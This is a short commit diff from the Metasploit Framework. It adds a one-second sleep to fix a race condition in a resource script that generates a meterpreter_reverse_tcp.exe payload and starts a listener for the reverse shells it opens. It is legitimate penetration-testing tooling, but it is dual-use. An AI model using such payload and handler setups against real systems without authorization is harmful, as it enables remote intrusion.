Fix #7603, Race condition when loading auto_win32_multihandler.rc
parent
3640e87a37
commit
f082fd5399
|
@ -13,6 +13,10 @@ def out_path
|
|||
"#{Msf::Config::local_directory}/meterpreter_reverse_tcp.exe"
|
||||
end
|
||||
|
||||
# Please see:
|
||||
# https://github.com/rapid7/metasploit-framework/issues/7603
|
||||
sleep(1)
|
||||
|
||||
run_single("use payload/#{PAYLOAD}")
|
||||
run_single("set lhost #{payload_lhost}")
|
||||
run_single("set lport #{payload_lport}")
|
||||
|
@ -25,4 +29,4 @@ run_single("set lhost #{payload_lhost}")
|
|||
run_single("set lport #{payload_lport}")
|
||||
run_single('set exitonsession false')
|
||||
run_single('run -j')
|
||||
</ruby>
|
||||
</ruby>
|
||||
|
|
Loading…
Reference in New Issue